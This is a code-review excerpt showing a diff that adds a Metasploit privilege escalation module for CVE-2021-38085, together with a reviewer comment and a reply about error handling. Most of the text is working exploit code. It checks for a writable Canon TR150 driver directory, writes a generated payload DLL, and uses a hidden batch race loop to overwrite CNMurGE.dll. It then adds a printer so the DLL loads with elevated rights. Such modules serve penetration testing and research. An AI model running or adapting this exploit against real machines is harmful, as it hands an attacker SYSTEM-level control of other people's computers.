modules/exploits/windows/local/canon_driver_privesc.rb

```diff
@@ -0,0 +1,154 @@
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2021-38085'],
+          ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => 'win',
+        'Payload' =>
+        {
+        },
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' =>
+          [
+            [
+              'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+            ]
+          ],
+        'Notes' =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ SERVICE_RESOURCE_LOSS ]
+        },
+        'DisclosureDate' => '2021-08-07',
+        'DefaultTarget' => 0
+      )
+    )
+
+    self.needs_cleanup = true
+  end
+
+  def check
+    @driver_path = ''
+    dir_name = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'
+
+    return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name)
+
+    language_dirs = dir(dir_name)
+
+    return CheckCode::Detected('Detected Canon driver directory, but no language files') unless language_dirs.length
+
+    @driver_path = dir_name
+    @driver_path.concat('\\LanguageModules\\040C')
+    res = cmd_exec("icacls \"#{@driver_path}\"")
+    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
+
+    return CheckCode::Detected('Canon driver directory does not have full permissions') unless vulnerable
+
+    vprint_status("Vulnerable driver directory: #{@driver_path}")
+    CheckCode::Appears('Canon driver directory has full permissions')
+  end
+
+  def add_printer(driver_name)
+    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)
+
+    dll_data = generate_payload_dll
+    dll_path = "#{@driver_path}\\CNMurGE.dll"
+
+    temp_path = expand_path('%TEMP%\\CNMurGE.dll')
+    vprint_status("Writing dll to #{temp_path}")
+
+    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
+    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
+    bat_file = <<~HEREDOC
+      attrib -a \"#{dll_path}\"
+      :repeat
+      for %%i in (\"#{dll_path}\") do echo %%~ai | find "a" >nul || goto :repeat
+      timeout /t 1
+      #{cp_cmd}
+      attrib -a \"#{dll_path}\"
+    HEREDOC
+
+    print_status("Dropping bat to #{bat_file_path}")
+    write_file(bat_file_path, bat_file)
+    write_file(temp_path, dll_data)
+    register_files_for_cleanup(bat_file_path, temp_path)
+
+    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
+    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
+    vprint_status('Executing script...')
+    client.sys.process.execute(bat_cmd, nil, { 'Hidden' => true })
+
+    print_status("Adding printer #{@printer_name}...")
+    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
+  rescue Rex::Post::Meterpreter::RequestError => e
+    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
```

Comment:
Seems like this should be using `fail_with` to prevent the module from continuing to run.

Reply:
Fixed in https://github.com/rapid7/metasploit-framework/pull/15520/commits/0e41a0e81ee7548d46eceec22a1f5e9d8e531a2e